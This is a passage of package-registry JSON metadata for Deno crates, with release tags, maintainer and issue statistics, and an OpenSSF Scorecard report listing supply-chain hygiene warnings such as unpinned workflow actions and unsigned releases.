1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T12:39:36.264Z","dependent_packages_count":12,"downloads":242959,"downloads_period":"total","dependent_repos_count":14,"rankings":{"downloads":11.774634423217673,"dependent_repos_count":6.9468838050537745,"dependent_packages_count":3.005956607200245,"stargazers_count":0.0022405114340766853,"forks_count":0.05750646014130159,"docker_downloads_count":6.790478681663616,"average":4.762950081451781},"purl":"pkg:cargo/deno_bench_util","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_bench_util","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_bench_util","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_bench_util/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_bench_util/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:19.235Z","updated_at":"2022-11-07T18:29:19.235Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.049Z","updated_at":"2023-07-18T22:41:23.049Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14867370,"name":"deno_v8","ecosystem":"cargo","description":"JavaScript engine facade for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2026-08-04T16:32:30.542Z","latest_release_published_at":"2026-08-06T11:33:01.984Z","latest_release_number":"0.2.0","last_synced_at":"2026-08-29T21:57:32.811Z","created_at":"2026-08-04T16:47:01.521Z","updated_at":"2026-08-31T09:36:56.177Z","registry_url":"https://crates.io/crates/deno_v8/","install_command":"cargo install deno_v8","documentation_url":"https://docs.rs/deno_v8/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow 